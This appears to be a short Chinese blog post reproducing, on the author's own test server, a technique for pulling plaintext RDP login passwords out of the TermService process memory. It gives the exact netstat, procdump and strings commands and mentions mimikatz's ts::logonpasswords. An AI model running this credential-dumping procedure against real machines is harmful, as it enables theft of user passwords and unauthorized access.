推特上看到一篇推文 他发现了在远程桌面服务的内存中存储了用户明文密码，本文复现下。

# 转储明文

我有一台08的server，账号密码为administrator admin08!@#。使用3389登录

运行如下命令转储远程桌面服务的进程内存

1
2

netstat -nob | Select-String TermService -Context 1
.\procdump.exe -accepteula -ma 2812 rdp.dmp

然后用strings过滤字符串发现确实抓到了明文

1

strings -el rdp.dmp |grep admin08 -C3

mimikatz发布了一个Pre-release版本，提供了ts::logonpasswords一键抓取，不过在2008上不起作用，等待本杰明继续更新。

# 思考

其他进程中是否还有明文保存？转储远程桌面服务进程的内存是不是不会被杀软拦截了？Windows是不是不安全了？

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。